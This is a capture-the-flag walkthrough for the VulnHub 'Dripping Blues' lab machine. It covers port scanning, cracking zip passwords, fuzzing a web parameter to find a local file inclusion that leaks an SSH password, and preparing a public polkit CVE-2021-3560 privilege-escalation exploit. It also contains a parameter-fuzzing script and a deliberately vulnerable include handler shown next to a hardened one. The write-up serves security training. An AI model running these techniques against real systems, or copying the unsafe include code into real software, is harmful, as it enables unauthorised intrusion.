VulnHub Dripping Blues target machine: detailed walkthrough (with privilege escalation)

Drippingblues

Author: jason_huawen

Target information

Name: Dripping Blues: 1

URL:

https://www.vulnhub.com/entry/dripping-blues-1,744/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:e5:b4:f2      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.168  08:00:27:16:3d:b8      1      60  PCS Systemtechnik GmbH          

Kali Linux's bundled netdiscover identifies the target host's IP address as 192.168.56.168 (192.168.56.1 is the host-only adapter and 192.168.56.100 the VirtualBox DHCP server).

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.168 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-12 03:04 EST
Nmap scan report for localhost (192.168.56.168)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.146
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
|   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/dripisreal.txt /etc/dripispowerful.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:16:3D:B8 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
                                                                 

The Nmap scan shows three open ports on the target: 21 (FTP, vsftpd 3.0.3, anonymous login allowed with one file, respectmydrip.zip, in the root), 22 (SSH, OpenSSH 8.2p1 on Ubuntu) and 80 (HTTP, Apache 2.4.41, with a robots.txt that disallows /dripisreal.txt and /etc/dripispowerful.html).

Getting a shell

Port 21 (FTP)

┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ftp 192.168.56.168
Connected to 192.168.56.168.
220 (vsFTPd 3.0.3)
Name (192.168.56.168:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||12988|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Sep 19  2021 .
drwxr-xr-x    2 0        0            4096 Sep 19  2021 ..
-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip
226 Directory send OK.
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||8960|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |********************************************************************************|   471        3.38 KiB/s    00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (3.37 KiB/s)
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||61132|)
550 Permission denied.
ftp> quit
221 Goodbye.
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ searchsploit vsFTPd 3.0.3                                  
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service                                                     | multiple/remote/49719.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ls
nmap_full_scan  respectmydrip.zip  test.txt
                                                
  1. The target allows anonymous FTP login.

  2. Anonymous users cannot upload: put test.txt fails with 550 Permission denied, even though the listing shows respectmydrip.zip as world-writable (-rwxrwxrwx).

  3. searchsploit lists only a remote denial-of-service for vsftpd 3.0.3, nothing that gives code execution, so the FTP service itself is not the way in; the downloaded archive is.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ unzip respectmydrip.zip 
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:                                                                                                                               
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ zip2john respectmydrip.zip > respectmydrip_hash
ver 2.0 respectmydrip.zip/respectmydrip.txt PKZIP Encr: cmplen=32, decmplen=20, crc=5C92F12B ts=96AB cs=5c92 type=0
ver 2.0 respectmydrip.zip/secret.zip is not encrypted, or stored with non-handled compression type
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ls
nmap_full_scan  respectmydrip_hash  respectmydrip.zip  test.txt
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt respectmydrip_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
072528035        (respectmydrip.zip/respectmydrip.txt)     
1g 0:00:00:04 DONE (2023-01-12 03:09) 0.2450g/s 3412Kp/s 3412Kc/s 3412KC/s 072551..072046870
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ unzip respectmydrip.zip
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password: 
 extracting: respectmydrip.txt       
  inflating: secret.zip              
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ls
nmap_full_scan  respectmydrip_hash  respectmydrip.txt  respectmydrip.zip  secret.zip  test.txt
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ cat respectmydrip.txt 
just focus on "drip"                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ unzip secret.zip       
Archive:  secret.zip
[secret.zip] secret.txt password:                                                                                                                               
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ zip2john secret.zip > secret_hash              
ver 2.0 secret.zip/secret.txt PKZIP Encr: cmplen=17, decmplen=12, crc=03D5A50D ts=970A cs=03d5 type=8
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash       
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 DONE (2023-01-12 03:10) 0g/s 5050Kp/s 5050Kc/s 5050KC/s !LUVDKR!..*7¡Vamos!
Session completed. 
                                                                                                                              

                                                                                                                              

secret.zip does not crack with rockyou.txt, so set it aside for now. Note that zip2john reported the secret.zip entry inside respectmydrip.zip as "not encrypted", which is why it could be extracted as soon as the outer password (072528035) was known; the secret.txt inside it is protected with a different password, and the only hint about it so far is "just focus on "drip"".

Port 80 (HTTP)

                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/             
<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>    
       
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/robots.txt
User-agent: *
Disallow: /dripisreal.txt
Disallow: /etc/dripispowerful.html
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/dripisreal.txt
hello dear hacker wannabe,

go for this lyrics:

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

count the n words and put them side by side then md5sum it

ie, hellohellohellohello >> md5sum hellohellohellohello

it's the password of ssh                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/etc/dripispowerful.html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.56.168 Port 80</address>
</body></html>
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/../../../../../../etc/dripispowerful.html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.56.168 Port 80</address>
</body></html>

Note that curl normalizes dot-segments before sending, so the request above actually went out as GET /etc/dripispowerful.html again; to send the literal ../ sequences you need curl --path-as-is. Either way Apache only serves files under its document root, so traversal in the URL path itself is not the route here: the path has to be handed to something on the server that opens files.
                                                   
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                   
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.168
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/01/12 03:21:39 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
Progress: 218879 / 220561 (99.24%)
===============================================================
2023/01/12 03:22:22 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.168
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              html,txt,sh,js,php
[+] Timeout:                 10s
===============================================================
2023/01/12 03:22:39 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 138]
/.html                (Status: 403) [Size: 279]
/robots.txt           (Status: 200) [Size: 78]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1322123 / 1323366 (99.91%)
===============================================================
2023/01/12 03:27:39 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ dirb http://192.168.56.168

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan 12 03:28:15 2023
URL_BASE: http://192.168.56.168/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.168/ ----
+ http://192.168.56.168/index.php (CODE:200|SIZE:138)                                                                        
+ http://192.168.56.168/robots.txt (CODE:200|SIZE:78)                                                                        
+ http://192.168.56.168/server-status (CODE:403|SIZE:279)                                                                    
                                                                                                                             
-----------------
END_TIME: Thu Jan 12 03:28:17 2023
DOWNLOADED: 4612 - FOUND: 3
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.txt,.sh,.js 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.168
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh,js
[+] Timeout:                 10s
===============================================================
2023/01/12 03:28:39 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 138]
/robots.txt           (Status: 200) [Size: 78]
/server-status        (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 135205 / 373710 (36.18%)[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.txt": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:07 [!] parse "http://192.168.56.168/besalu\t.js": net/url: invalid control character in URL
Progress: 143764 / 373710 (38.47%)[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/01/12 03:29:09 [!] parse "http://192.168.56.168/error\x1f_log.js": net/url: invalid control character in URL
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 138]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 372745 / 373710 (99.74%)
===============================================================
2023/01/12 03:30:05 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.txt,.sh,.js 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.168
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh,js
[+] Timeout:                 10s
===============================================================
2023/01/12 03:30:50 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html       (Status: 403) [Size: 279]
/.htaccess.js         (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess.sh         (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.js         (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.sh         (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 138]
/robots.txt           (Status: 200) [Size: 78]
/robots.txt           (Status: 200) [Size: 78]
/server-status        (Status: 403) [Size: 279]
Progress: 121654 / 122862 (99.02%)
===============================================================
2023/01/12 03:31:15 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ gobuster dir -u http://192.168.56.168 -w /usr/share/seclists/Web-Shells/backdoor_list.txt -x .php,.html,.txt,.sh,.js 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.168
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Web-Shells/backdoor_list.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              html,txt,sh,js,php
[+] Timeout:                 10s
===============================================================
2023/01/12 03:31:33 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 138]
/index.php            (Status: 200) [Size: 138]
/index.php            (Status: 200) [Size: 138]

===============================================================
2023/01/12 03:31:34 Finished
===============================================================


Back to the robots.txt hints. One entry is /etc/dripispowerful.html, which looks like an absolute filesystem path rather than a web path. Requesting it directly returns 404, and directory brute-forcing finds nothing beyond index.php and robots.txt, so the likely explanation is that index.php includes a file named by a GET parameter. Fuzz the parameter name with that path as the value. The --hw 21 filter hides every response with exactly 21 words, which is the word count of the unmodified index page, so only parameter names that change the output are shown. (The lyrics riddle in dripisreal.txt was not pursued; the route below yields the SSH password without it.)

┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ wfuzz -c -u http://192.168.56.168/?FUZZ=/etc/dripispowerful.html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 21
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.168/?FUZZ=/etc/dripispowerful.html
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                      
=====================================================================

000172073:   200        40 L     68 W       590 Ch      "drip"                                                       

Total time: 284.1401
Processed Requests: 220560
Filtered Requests: 220559
Requests/sec.: 776.2367
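
The logic behind the wfuzz step, as an added example that is not part of the original write-up: measure the page's baseline word count with a throwaway parameter name, then report every candidate name whose response differs, which is what --hw 21 leaves on screen. The HTTP layer is injected as a callable so the script runs offline; fake_fetch, BASELINE_PAGE and INCLUDED_FILE are constructed stand-ins for the target (BASELINE_PAGE reproduces the 21-word index page, and the candidate parameter names are illustrative). http_fetch is the live replacement for an in-scope host.

```python
import secrets
from typing import Callable, Iterable, List, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit
from urllib.request import urlopen

# Constructed approximation of the 138-byte index page the target returns:
# 21 whitespace-separated tokens, hence the write-up's --hw 21 filter.
BASELINE_PAGE = (
    "<html>\n<body>\ndriftingblues is hacked again so it's now called "
    "drippingblues. :D hahaha\n<br>\nby\n<br>\ntravisscott & thugger\n"
    "</body>\n</html>\n"
)
# Constructed stand-in for the visible part of the file included via ?drip=.
INCLUDED_FILE = "password is:\nimdrippinbiatch\n"
TARGET_PATH = "/etc/dripispowerful.html"

Fetch = Callable[[str], str]


def word_count(body: str) -> int:
    """The same metric wfuzz reports in its 'Word' column."""
    return len(body.split())


def fake_fetch(url: str) -> str:
    """Constructed offline stand-in for the target: only a parameter named
    'drip' is treated as an include, and the included file is emitted before
    the page's own HTML, as observed on the real box."""
    params = parse_qs(urlsplit(url).query)
    if params.get("drip") == [TARGET_PATH]:
        return INCLUDED_FILE + BASELINE_PAGE
    return BASELINE_PAGE


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Live fetch for an in-scope target (not used by the offline demo)."""
    with urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def measure_baseline(fetch: Fetch, base_url: str, value: str) -> int:
    """Word count of the page when an unknown parameter carries the payload.
    A random name is used so a lucky real hit cannot poison the baseline."""
    junk = secrets.token_hex(6)
    return word_count(fetch(f"{base_url}?{urlencode({junk: value})}"))


def find_include_params(fetch: Fetch, base_url: str, names: Iterable[str],
                        value: str) -> List[Tuple[str, int]]:
    """Return (name, words) for each parameter name whose response differs
    from the baseline; this is what `wfuzz --hw <baseline>` prints."""
    baseline = measure_baseline(fetch, base_url, value)
    hits = []
    for name in names:
        wc = word_count(fetch(f"{base_url}?{urlencode({name: value})}"))
        if wc != baseline:
            hits.append((name, wc))
    return hits


def strip_wrapper(body: str, baseline_page: str) -> str:
    """Recover the raw included file: with this include-then-render pattern
    the file is printed first and the page's own HTML follows it."""
    return body[: -len(baseline_page)] if body.endswith(baseline_page) else body


if __name__ == "__main__":
    base = "http://192.168.56.168/"
    candidates = ["page", "file", "include", "drip", "view", "path"]  # illustrative
    for name, words in find_include_params(fake_fetch, base, candidates, TARGET_PATH):
        body = fake_fetch(f"{base}?{urlencode({name: TARGET_PATH})}")
        raw = strip_wrapper(body, BASELINE_PAGE)
        print(f"{name}: {words} words vs 21 baseline; included content:\n{raw}")
```

Against the real target the hit has 68 words, i.e. the 47 words of the included file plus the 21 of the index page; strip_wrapper is the step that turns such a response back into the bare file when you later pull /etc/passwd or similar through the same parameter.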

┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ curl http://192.168.56.168/?drip=/etc/dripispowerful.html           
<!DOCTYPE html>
<html>
<body>
<style>
body {
background-image: url('drippin.jpg');
background-repeat: no-repeat;
}

@font-face {
    font-family: Segoe;
    src: url('segoeui.ttf');
}

.mainfo {
  text-align: center;
  border: 1px solid #000000;
  font-family: 'Segoe';
  padding: 5px;
  background-color: #ffffff;
  margin-top: 300px;
}

.emoji {
        width: 32px;
        }
</style>
password is:
imdrippinbiatch
</body>
</html>

<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>             
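
The server's PHP source is not shown in this write-up, so the following is an added example rather than the target's code: a Python model of the include-by-parameter pattern the ?drip= behaviour implies, beside a hardened version. The webroot, the page names home and about, and the file standing in for /etc/dripispowerful.html are all constructed for the demo.

```python
import os
import tempfile
from pathlib import Path

ALLOWED_PAGES = frozenset({"home", "about"})  # hypothetical page names


def render_unsafe(webroot: str, page: str) -> str:
    """Vulnerable pattern: the request parameter is used directly as a path.
    os.path.join drops every earlier component when `page` is absolute, and
    '../' walks out of the directory, so any file the web server user can
    read (here a stand-in for /etc/dripispowerful.html) is returned."""
    with open(os.path.join(webroot, "pages", page), encoding="utf-8") as fh:
        return fh.read()


class IncludeRejected(ValueError):
    """Raised by render_safe for anything outside the allowlist or directory."""


def render_safe(webroot: str, page: str, allowlist=ALLOWED_PAGES) -> str:
    """Hardened pattern: the parameter selects from a fixed set of names and
    is never used as a path fragment; the resolved real path is then checked
    to still be inside the pages directory as a second, independent guard."""
    if page not in allowlist:
        raise IncludeRejected(f"unknown page {page!r}")
    base = Path(webroot, "pages").resolve()
    target = (base / f"{page}.html").resolve()
    if base not in target.parents:
        raise IncludeRejected("resolved path escapes the pages directory")
    return target.read_text(encoding="utf-8")


def demo() -> dict:
    """Constructed data: a throwaway webroot with one legitimate page and a
    'secret' file outside the pages directory, run through both handlers."""
    root = tempfile.mkdtemp()
    pages = Path(root, "pages")
    pages.mkdir()
    (pages / "home.html").write_text("<h1>home</h1>", encoding="utf-8")
    secret = Path(root, "dripispowerful.html")
    secret.write_text("password is:\nimdrippinbiatch\n", encoding="utf-8")

    results = {
        "unsafe_absolute": render_unsafe(root, str(secret)),
        "unsafe_traversal": render_unsafe(root, "../dripispowerful.html"),
        "safe_home": render_safe(root, "home"),
    }
    # The same inputs against the hardened handler must all be refused.
    for attempt in (str(secret), "../dripispowerful.html", "home/../../dripispowerful"):
        try:
            render_safe(root, attempt)
            results[attempt] = "ALLOWED"
        except IncludeRejected:
            results[attempt] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The allowlist alone would be enough for this handler; the realpath containment check is kept because it keeps working when someone later loosens the allowlist or adds a symlink under the pages directory.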

The file's contents appear before the normal index page, so index.php includes whatever path the drip parameter names: a local file inclusion. That gives the password imdrippinbiatch but no username; the index page credits travisscott and thugger, so try both over SSH.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ssh travisscott@192.168.56.168      
The authenticity of host '192.168.56.168 (192.168.56.168)' can't be established.
ED25519 key fingerprint is SHA256:eVoGERVw0lG6hbny1KztaN+fD1oHC/zhGfuexoATqME.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.168' (ED25519) to the list of known hosts.
travisscott@192.168.56.168's password: 
Permission denied, please try again.
travisscott@192.168.56.168's password: 

                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ssh thugger@192.168.56.168    
thugger@192.168.56.168's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.11.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


495 updates can be installed immediately.
233 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2025.
thugger@drippingblues:~$ id
uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)
thugger@drippingblues:~$ 

SSH login succeeds as thugger with the password imdrippinbiatch; travisscott is rejected.

thugger@drippingblues:~$ cat user.txt
5C50FC503A2ABE93B4C5EE3425496521
thugger@drippingblues:~$ cat .bash_history 
su root
thugger@drippingblues:~$ sudo -l
[sudo] password for thugger: 
Sorry, try again.
[sudo] password for thugger: 
Sorry, user thugger may not run sudo on drippingblues.
thugger@drippingblues:~$ cd Desktop/
thugger@drippingblues:~/Desktop$ ls -alh
total 8,0K
drwxr-xr-x  2 thugger thugger 4,0K Eyl 18  2021 .
drwxr-xr-x 14 thugger thugger 4,0K Eyl 19  2021 ..
thugger@drippingblues:~/Desktop$ cd ..
thugger@drippingblues:~$ cd Documents/
thugger@drippingblues:~/Documents$ ls -lha
total 8,0K
drwxr-xr-x  2 thugger thugger 4,0K Eyl 18  2021 .
drwxr-xr-x 14 thugger thugger 4,0K Eyl 19  2021 ..
thugger@drippingblues:~/Documents$ cd ..
thugger@drippingblues:~$ cd Pictures/
thugger@drippingblues:~/Pictures$ ls -lha
total 8,0K
drwxr-xr-x  2 thugger thugger 4,0K Eyl 18  2021 .
drwxr-xr-x 14 thugger thugger 4,0K Eyl 19  2021 ..
thugger@drippingblues:~/Pictures$ cd ..
thugger@drippingblues:~$ cd Public/
thugger@drippingblues:~/Public$ ls
thugger@drippingblues:~/Public$ cd /home
thugger@drippingblues:/home$ ls -alh
total 12K
drwxr-xr-x  3 root    root    4,0K Eyl 18  2021 .
drwxr-xr-x 21 root    root    4,0K Eyl 19  2021 ..
drwxr-xr-x 14 thugger thugger 4,0K Eyl 19  2021 thugger
thugger@drippingblues:/home$ cd /tmp
thugger@drippingblues:/tmp$ 

Privilege escalation

Checking the process list (ps aux) shows polkitd running as root:

root         550  0.0  0.2 238996 11560 ?        Ssl  06:32   0:00 /usr/lib/policykit-1/polkitd --no-debug

The box is Ubuntu 20.04 with 495 pending updates (see the login banner), so its polkit is very likely still affected by CVE-2021-3560, an authentication bypass in polkit's D-Bus authorization check: when the client that requested a privileged action disconnects from the bus before polkit has finished resolving its uid, vulnerable versions mishandle the lookup error and let the request through without authentication. The script cloned below races exactly that: it asks accounts-daemon over D-Bus to create an administrator-type account (the int32:1 argument), kills dbus-send a few milliseconds later, and then uses the same trick to set the new account's password. It needs accountsservice (org.freedesktop.Accounts) on the system bus and the dbus-send binary on the target, both normal on an Ubuntu desktop install, and it leaves a new local user behind that should be noted for cleanup.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ git clone https://github.com/Almorabea/Polkit-exploit.git                                                           
Cloning into 'Polkit-exploit'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (30/30), done.
remote: Total 31 (delta 12), reused 2 (delta 0), pack-reused 0
Receiving objects: 100% (31/31), 6.32 MiB | 2.91 MiB/s, done.
Resolving deltas: 100% (12/12), done.
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ ls
linpeas.sh      Polkit-exploit      respectmydrip.txt  secret_hash  test.txt
nmap_full_scan  respectmydrip_hash  respectmydrip.zip  secret.zip
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/drippingblues]
└─$ cd Polkit-exploit                 
                                                                                                                              
